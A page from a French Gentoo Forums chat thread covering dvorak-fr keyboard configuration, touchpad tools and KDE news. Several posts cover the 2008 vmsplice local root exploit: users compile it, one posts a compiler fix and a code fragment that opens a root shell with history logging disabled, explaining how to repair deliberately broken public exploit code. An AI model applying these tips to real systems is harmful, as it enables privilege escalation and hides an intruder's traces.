Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
[3615Mavie] : Chroniques de geeks
View unanswered posts
View posts from last 24 hours

Goto page Previous  1, 2, 3 ... 47, 48, 49, 50  Next  
This topic is locked: you cannot edit posts or make replies.    Gentoo Forums Forum Index French
View previous topic :: View next topic  
Author Message
E11
l33t
l33t


Joined: 24 Feb 2004
Posts: 764
Location: Bruxelles

PostPosted: Sat Feb 09, 2008 4:31 pm    Post subject: Reply with quote

@ utilisateur dvorak : quelle est la meilleur version de dvorak-fr ? j'aimerais bien m'y mettre, mais j'ai vu 2-3 version différente de dvorak-fr (celle de Francis Leboutte, celle de Josselin Mouette, bepo,...), et j'avoue que j'ai un peu du mal à choisir :roll:
Utilisez-vous la version utilisé par défaut dans xorg (celle de J.Mouette) ? laquelle aurait le plus de chance d'être la version n°1 dans le futur ?

Merci de vos conseils ! :-)
_________________
Real power cannot be given. It must be taken.
Heureux l'étudiant qui comme la rivière peut suivre son cours sans quitter son lit.
Back to top
View user's profile Send private message
kwenspc
Advocate
Advocate


Joined: 21 Sep 2003
Posts: 4917

PostPosted: Sat Feb 09, 2008 5:07 pm    Post subject: Reply with quote

E11 wrote:

Utilisez-vous la version utilisé par défaut dans xorg (celle de J.Mouette) ?

C'est celle que j'utilise oui, c'est la plus simple à mettre en place. Et puis les autres versions sont trop basées sur l'utilisation particulière de certains utilisateurs. Moins sur que ça colle pour tout le monde du coup.
_________________
membre officieux du SAV Ati GEntoo
Back to top
View user's profile Send private message
E11
l33t
l33t


Joined: 24 Feb 2004
Posts: 764
Location: Bruxelles

PostPosted: Sat Feb 09, 2008 5:12 pm    Post subject: Reply with quote

Oki ! C'est celle que je pensais prendre, donc ça tombe bien ! XD

Merci :-)
_________________
Real power cannot be given. It must be taken.
Heureux l'étudiant qui comme la rivière peut suivre son cours sans quitter son lit.
Back to top
View user's profile Send private message
truc
Advocate
Advocate


Joined: 25 Jul 2005
Posts: 3199

PostPosted: Sun Feb 10, 2008 4:50 pm    Post subject: Reply with quote

E11 wrote:
@ utilisateur dvorak : quelle est la meilleur version de dvorak-fr ?


salut salut, tu peux regarder ici, j'avais essayé le layout dvorak bépo, et en avais fait mes commentaires, mais la grosse critique que je lui avais fait était qu'il était vraiment trop spécicifique au language français.. bref pas du tout un clavier pour informatien ou gros geek donc, plus quelque chose pour une secrétaire...

Bref après c'était mon avis quoi, ça vaut ce que ça vaut, (c'est pas plus blanc que blanc ni rien d'extraordinaire quoi..)
_________________
The End of the Internet!
Back to top
View user's profile Send private message
E11
l33t
l33t


Joined: 24 Feb 2004
Posts: 764
Location: Bruxelles

PostPosted: Sun Feb 10, 2008 9:40 pm    Post subject: Reply with quote

Oki, merci pour ces conseils !

J'ai commencé sur JM et il me parait pas mal pour le moment :) appart le "z" mis à perpette les zouilles et que j'utilise assez souvent ^^'.

Enfin bref, maintenant reste plus qu'à s'y mettre :P lol par contre, pour avoir dvorak-fr par défaut partout, comment avez-vous fait ? car j'ai essayer en téléchargeant une archive dvorak-fr, en la mettant dans le bon répertoire, en configurant comme il faut keymaps & xorg.conf et j'ai certaines touches qui ne fonctionne pas (style é,è,...) mais aucun problème avec les autres... (j'ai suivit le howto de gentoofr et de ce qui a été dis sur un poste dvorak)

Edit : en faite le clavier fonctionne très bien quand je lance la configuration via setxkbmap ou quand je suis dans la console mais pas directement via xorg...

ma config :

Code:
Section "InputDevice"

    Identifier  "Keyboard1"
    Driver      "kbd"
    Option "AutoRepeat" "500 30"
    Option "XkbModel"   "ltcd"
    Option "XkbLayout"  "dvorak,fr"
    Option "XkbVariant" "fr,"
    Option "XkbOptions" "grp:alt_shift_toggle"

EndSection


Aurais-je fais une erreur ?

Merci pour votre aide !

PS : waaa, c'est dur au début lol
_________________
Real power cannot be given. It must be taken.
Heureux l'étudiant qui comme la rivière peut suivre son cours sans quitter son lit.
Back to top
View user's profile Send private message
NEOxAKIRA
Guru
Guru


Joined: 20 May 2007
Posts: 302
Location: France

PostPosted: Mon Feb 11, 2008 6:34 am    Post subject: Reply with quote

Voici une petite astuce que j'ai trouvé en me baladant dans le forum anglais et qui est aussidans le man eix :
Code:
echo "*" >> /etc/eix-sync.conf

et eix-sync synchronisera les overlays en plus de portage...
Back to top
View user's profile Send private message
Mickael
Advocate
Advocate


Joined: 05 Sep 2005
Posts: 2383
Location: ~Belfort! - France - EU

PostPosted: Mon Feb 11, 2008 7:55 am    Post subject: Reply with quote

Sinon tu peux tout simplement l'ctiver ou le désactiver à la volée depuis un shell :
Code:
synclient TouchpadOff=1
synclient TouchpadOff=0


EDIT : je parle en fait du touchpad, j'avais pas vu tous les messages qui étaient derrières....:/
_________________
À LIRE : COMMENT POSTER ET OBTENIR DE L'AIDE ?
Qui suis-je ? Bon j'ai relu, comme d'habitude, je suis bon a rien le vendredi
Qui suis-je ? Je ne serai jamais modo
Back to top
View user's profile Send private message
Temet
Advocate
Advocate


Joined: 14 Mar 2006
Posts: 2579
Location: 92

PostPosted: Mon Feb 11, 2008 8:13 am    Post subject: Reply with quote

Ouais j'ai une touche qui fait ça déjà, le basculer entre actif/inactif.
Mais là, ça m'évite de devoir l'activer ou le désactiver sans arrêt.
J'ai utilisé le touchpad ce week end avec le coup du syndaemon et franchement, c'est transparent et anti-gaffes... je suis fan! :D
_________________
Full Gentoo powered.
Back to top
View user's profile Send private message
Mickael
Advocate
Advocate


Joined: 05 Sep 2005
Posts: 2383
Location: ~Belfort! - France - EU

PostPosted: Mon Feb 11, 2008 10:58 am    Post subject: Reply with quote

Juste pour information les KDEïstes, aller dans la partie CHAT, forum, :
[NEWS] KDE 4.0.1 added to Portage tree juste histoire de contribuer au feedback sur la version 4.0.1 plus il y aura de retour, plus vite KDE convergera vers une version stable :)

C'est également annoncé sur le site gentoo.org.
_________________
À LIRE : COMMENT POSTER ET OBTENIR DE L'AIDE ?
Qui suis-je ? Bon j'ai relu, comme d'habitude, je suis bon a rien le vendredi
Qui suis-je ? Je ne serai jamais modo
Back to top
View user's profile Send private message
Temet
Advocate
Advocate


Joined: 14 Mar 2006
Posts: 2579
Location: 92

PostPosted: Mon Feb 11, 2008 11:29 am    Post subject: Reply with quote

Ouais j'ai remarqué que depuis quelques temps il y a pas mal de news sur le planet.
Si ca reste comme ça, ça compense bien la GWN.
_________________
Full Gentoo powered.
Back to top
View user's profile Send private message
SnowBear
l33t
l33t


Joined: 03 Sep 2005
Posts: 723
Location: Dax [40]

PostPosted: Mon Feb 11, 2008 4:24 pm    Post subject: Reply with quote

Qui a dit que gentoo était au bord du gouffre ?
Ce matin j'ai pu lire à droite et à gauche qu'il y avait un nouvel exploit permettant à un simple utilisateur de devenir root et... je viens de faire un emerge --sync et zou les nouveaux noyaux sont disponibles _o/ .

Merci aux devs pour leur boulot.
Back to top
View user's profile Send private message
kwenspc
Advocate
Advocate


Joined: 21 Sep 2003
Posts: 4917

PostPosted: Mon Feb 11, 2008 4:25 pm    Post subject: Reply with quote

SnowBear wrote:

Merci aux devs pour leur boulot.

mieux: les heureux utilisateurs d'une gentoo-hardened n'ont pas à s'inquiéter. Si elle a été bien config l'exploit fonctionne pas. :)
_________________
membre officieux du SAV Ati GEntoo
Back to top
View user's profile Send private message
geekounet
Bodhisattva
Bodhisattva


Joined: 11 Oct 2004
Posts: 3756
Location: Lyon, France

PostPosted: Mon Feb 11, 2008 5:32 pm    Post subject: Reply with quote

Bah perso sur un 2.6.24.1 vanilla, l'exploit ne passe pas, apparemment que j'ai pas ce vmsplice ... :roll: Je sais pas pourquoi, mais c'est une bonne chose en tout cas :D
_________________
Google+ | Twitter
Back to top
View user's profile Send private message
d2_racing
Moderator
Moderator


Joined: 25 Apr 2005
Posts: 13046
Location: Ste-Foy,Canada

PostPosted: Mon Feb 11, 2008 5:48 pm    Post subject: Reply with quote

geekounet wrote:
Bah perso sur un 2.6.24.1 vanilla, l'exploit ne passe pas, apparemment que j'ai pas ce vmsplice ... :roll: Je sais pas pourquoi, mais c'est une bonne chose en tout cas :D


Est-ce qu'il y a une place sur le net qui montre le code qui fait cet exploit ?

J'ai juste vu plusieurs sites qui montrent le résultat, mais on ne voit jamais le contenu du ficheir .c
_________________
Sysadmin of GentooQuébec.org
Wiki
Signature
IRC on Freenode : #gentoo-quebec
Back to top
View user's profile Send private message
nonas
Guru
Guru


Joined: 17 Apr 2005
Posts: 328

PostPosted: Mon Feb 11, 2008 6:04 pm    Post subject: Reply with quote

Quote:
Est-ce qu'il y a une place sur le net qui montre le code qui fait cet exploit ?

J'ai juste vu plusieurs sites qui montrent le résultat, mais on ne voit jamais le contenu du ficheir .c
Regarde sur linuxfr.
Back to top
View user's profile Send private message
geekounet
Bodhisattva
Bodhisattva


Joined: 11 Oct 2004
Posts: 3756
Location: Lyon, France

PostPosted: Mon Feb 11, 2008 6:08 pm    Post subject: Reply with quote

nonas wrote:
Quote:
Est-ce qu'il y a une place sur le net qui montre le code qui fait cet exploit ?

J'ai juste vu plusieurs sites qui montrent le résultat, mais on ne voit jamais le contenu du ficheir .c
Regarde sur linuxfr.

Et Slashdot :)
_________________
Google+ | Twitter
Back to top
View user's profile Send private message
NEOxAKIRA
Guru
Guru


Joined: 20 May 2007
Posts: 302
Location: France

PostPosted: Mon Feb 11, 2008 7:44 pm    Post subject: Reply with quote

Temet wrote:
Y en a qui vont se moquer de moi mais je viens de découvrir syndaemon.
Pour les possesseurs de laptop qui ne le connaissent pas, ce truc va révolutionner votre vie (ou pas ^^).
N'avez vous jamais pesté en ayant malencontreusement tapé sur votre touchpad pendant que vous tapiez? Bah syndaemon désactive le touchpad pendant qu'on utilise le clavier et le réactive dès qu'on arrête de taper. La durée est réglable. Il suffit de le lancer avec votre session (en user).
Perso là je lance un "syndaemon -t -d -i 1" dans mon "~/.kde/Autostart" pour mettre un timeout de 1 seconde... je verrai bien à l'utilisation si je dois ajuster ou pas.

Enfin bref, je ne savais pas que c'était faisable ce truc alors que j'en rêvais... c'est beau de se paumer sur le net! :D


Temet j'ai fait passer l'info a mon prof de développement et voici le mail qu'il vient de m'envoyer :
Quote:
MERCI

C'est super syndeamon, ca me change la vie.

t'aura fait un heureux, son touchpad le saoulait et il arrivait pas à le désactiver comme il voulait...
Back to top
View user's profile Send private message
Temet
Advocate
Advocate


Joined: 14 Mar 2006
Posts: 2579
Location: 92

PostPosted: Mon Feb 11, 2008 9:04 pm    Post subject: Reply with quote

Cool!!!
J'aurai au moins aidé quelqu'un sur ce forum en presque deux ans \o/
_________________
Full Gentoo powered.
Back to top
View user's profile Send private message
boozo
Advocate
Advocate


Joined: 01 Jul 2004
Posts: 3141

PostPosted: Mon Feb 11, 2008 10:25 pm    Post subject: Reply with quote

geekounet wrote:
Bah perso sur un 2.6.24.1 vanilla, l'exploit ne passe pas, apparemment que j'ai pas ce vmsplice ... :roll: Je sais pas pourquoi, mais c'est une bonne chose en tout cas :D

ai dû raté qqch (2.6.21-gentoo-r4) :roll: :
Code:
 $ gcc linux_vmsplice.c -o linux_vmsplice
linux_vmsplice.c:30:22: erreur: asm/page.h : Aucun fichier ou répertoire de ce type
linux_vmsplice.c: In function 'main':
linux_vmsplice.c:211: erreur: 'PAGE_SIZE' undeclared (first use in this function)
linux_vmsplice.c:211: erreur: (Each undeclared identifier is reported only once
linux_vmsplice.c:211: erreur: for each function it appears in.)

_________________
" Un psychotique, c'est quelqu'un qui croit dur comme fer que 2 et 2 font 5, et qui en est pleinement satisfait.
Un névrosé, c'est quelqu'un qui sait pertinemment que 2 et 2 font 4, et ça le rend malade ! "
Back to top
View user's profile Send private message
geekounet
Bodhisattva
Bodhisattva


Joined: 11 Oct 2004
Posts: 3756
Location: Lyon, France

PostPosted: Mon Feb 11, 2008 10:45 pm    Post subject: Reply with quote

boozo wrote:
geekounet wrote:
Bah perso sur un 2.6.24.1 vanilla, l'exploit ne passe pas, apparemment que j'ai pas ce vmsplice ... :roll: Je sais pas pourquoi, mais c'est une bonne chose en tout cas :D

ai dû raté qqch (2.6.21-gentoo-r4) :roll: :
Code:
 $ gcc linux_vmsplice.c -o linux_vmsplice
linux_vmsplice.c:30:22: erreur: asm/page.h : Aucun fichier ou répertoire de ce type
linux_vmsplice.c: In function 'main':
linux_vmsplice.c:211: erreur: 'PAGE_SIZE' undeclared (first use in this function)
linux_vmsplice.c:211: erreur: (Each undeclared identifier is reported only once
linux_vmsplice.c:211: erreur: for each function it appears in.)

Code:
$ gcc linux_vmsplice.c -o linux_vmsplice -I /usr/src/linux/include

;)
_________________
Google+ | Twitter
Back to top
View user's profile Send private message
boozo
Advocate
Advocate


Joined: 01 Jul 2004
Posts: 3141

PostPosted: Mon Feb 11, 2008 10:53 pm    Post subject: Reply with quote

ouais... là... j'ai aucune excuse... même avec la grippe... bn :cry:
_________________
" Un psychotique, c'est quelqu'un qui croit dur comme fer que 2 et 2 font 5, et qui en est pleinement satisfait.
Un névrosé, c'est quelqu'un qui sait pertinemment que 2 et 2 font 4, et ça le rend malade ! "
Back to top
View user's profile Send private message
E11
l33t
l33t


Joined: 24 Feb 2004
Posts: 764
Location: Bruxelles

PostPosted: Tue Feb 12, 2008 1:17 am    Post subject: Reply with quote

E11 wrote:
Oki, merci pour ces conseils !

J'ai commencé sur JM et il me parait pas mal pour le moment :) appart le "z" mis à perpette les zouilles et que j'utilise assez souvent ^^'.

Enfin bref, maintenant reste plus qu'à s'y mettre :P lol par contre, pour avoir dvorak-fr par défaut partout, comment avez-vous fait ? car j'ai essayer en téléchargeant une archive dvorak-fr, en la mettant dans le bon répertoire, en configurant comme il faut keymaps & xorg.conf et j'ai certaines touches qui ne fonctionne pas (style é,è,...) mais aucun problème avec les autres... (j'ai suivit le howto de gentoofr et de ce qui a été dis sur un poste dvorak)

Edit : en faite le clavier fonctionne très bien quand je lance la configuration via setxkbmap ou quand je suis dans la console mais pas directement via xorg...

ma config :

Code:
Section "InputDevice"

    Identifier  "Keyboard1"
    Driver      "kbd"
    Option "AutoRepeat" "500 30"
    Option "XkbModel"   "ltcd"
    Option "XkbLayout"  "dvorak,fr"
    Option "XkbVariant" "fr,"
    Option "XkbOptions" "grp:alt_shift_toggle"

EndSection


Aurais-je fais une erreur ?

Merci pour votre aide !

PS : waaa, c'est dur au début lol


Personne n'a d'idée ?
_________________
Real power cannot be given. It must be taken.
Heureux l'étudiant qui comme la rivière peut suivre son cours sans quitter son lit.
Back to top
View user's profile Send private message
guilc
Moderator
Moderator


Joined: 15 Nov 2003
Posts: 3323
Location: Paris - France

PostPosted: Tue Feb 12, 2008 6:27 am    Post subject: Reply with quote

geekounet wrote:
Bah perso sur un 2.6.24.1 vanilla, l'exploit ne passe pas, apparemment que j'ai pas ce vmsplice ... :roll: Je sais pas pourquoi, mais c'est une bonne chose en tout cas :D

Bah souvent les codes d'exploits que tu trouve ne fonctionnent pas direct ;) Il faut faire la bonne modification qui fait que l'exploit va marcher :p
Les gars qui font souvent ça le font pour que les exploits ne soient pas utilisable par quelqu'un qui n'y comprend rien dans un but malveillant (au hasard, un petit script-kiddy)...

Le bon exploit à cette fonction :
Code:
void    exit_code()
{
        if (getuid() != 0)
                die("wtf", 0);

        printf("[+] root\n");
        putenv("HISTFILE=/dev/null");
        execl("/bin/bash", "bash", "-i", NULL);
        die("/bin/bash", errno);
}


Ce code la par exemple : http://groups.google.com/group/linux.debian.user/attach/aca1e166481634d6/disable-vmsplice-if-exploitable.c?part=2
Ben il fonctionne pas, faut modifier la fonction exit_code, la fonction de_exploit ne sert à rien ;)

Et du coup, l'exploit fonctionne très bien, même sur 2.6.24.1.
Seul un noyau protégé par PAX, même s'il est dans une version concernée par le problème, (ou un 2.6.24.2 ou < 2.6.17) n'est pas vulnérable...
_________________
Merci de respecter les règles du forum.

Mon site perso : https://www.xwing.info
Mon PORTDIR_OVERLAY : https://gentoo.xwing.info ou layman -a xwing
Back to top
View user's profile Send private message
geekounet
Bodhisattva
Bodhisattva


Joined: 11 Oct 2004
Posts: 3756
Location: Lyon, France

PostPosted: Tue Feb 12, 2008 6:49 am    Post subject: Reply with quote

guilc wrote:
geekounet wrote:
Bah perso sur un 2.6.24.1 vanilla, l'exploit ne passe pas, apparemment que j'ai pas ce vmsplice ... :roll: Je sais pas pourquoi, mais c'est une bonne chose en tout cas :D

Bah souvent les codes d'exploits que tu trouve ne fonctionnent pas direct ;) Il faut faire la bonne modification qui fait que l'exploit va marcher :p
Les gars qui font souvent ça le font pour que les exploits ne soient pas utilisable par quelqu'un qui n'y comprend rien dans un but malveillant (au hasard, un petit script-kiddy)...

Le bon exploit à cette fonction :
Code:
void    exit_code()
{
        if (getuid() != 0)
                die("wtf", 0);

        printf("[+] root\n");
        putenv("HISTFILE=/dev/null");
        execl("/bin/bash", "bash", "-i", NULL);
        die("/bin/bash", errno);
}


Ce code la par exemple : http://groups.google.com/group/linux.debian.user/attach/aca1e166481634d6/disable-vmsplice-if-exploitable.c?part=2
Ben il fonctionne pas, faut modifier la fonction exit_code, la fonction de_exploit ne sert à rien ;)

Et du coup, l'exploit fonctionne très bien, même sur 2.6.24.1.
Seul un noyau protégé par PAX, même s'il est dans une version concernée par le problème, (ou un 2.6.24.2 ou < 2.6.17) n'est pas vulnérable...

Ouais enfin, moi il se coupe avant le "wtf" :)
Code:
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7f96000 .. 0xb7fc8000
[-] vmsplice: No such file or directory

_________________
Google+ | Twitter
Back to top
View user's profile Send private message
kwenspc
Advocate
Advocate


Joined: 21 Sep 2003
Posts: 4917

PostPosted: Tue Feb 12, 2008 8:16 am    Post subject: Reply with quote

E11 wrote:

Personne n'a d'idée ?

Essais:
Code:

    Option "XkbLayout"  "dvorak"
    Option "XkbVariant" "fr"

Je suis pas sûr de mon coup là par contre (je suis pas @home)
Ce qui est sûr c'est que j'ai le dvorak-fr partout, après reboot ou quelque soit la session Xorg que je lance. Je te dis ça ce soir plus précisément.
_________________
membre officieux du SAV Ati GEntoo
Back to top
View user's profile Send private message
Display posts from previous:   
This topic is locked: you cannot edit posts or make replies.    Gentoo Forums Forum Index French All times are GMT
Goto page Previous  1, 2, 3 ... 47, 48, 49, 50  Next
Page 48 of 50

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum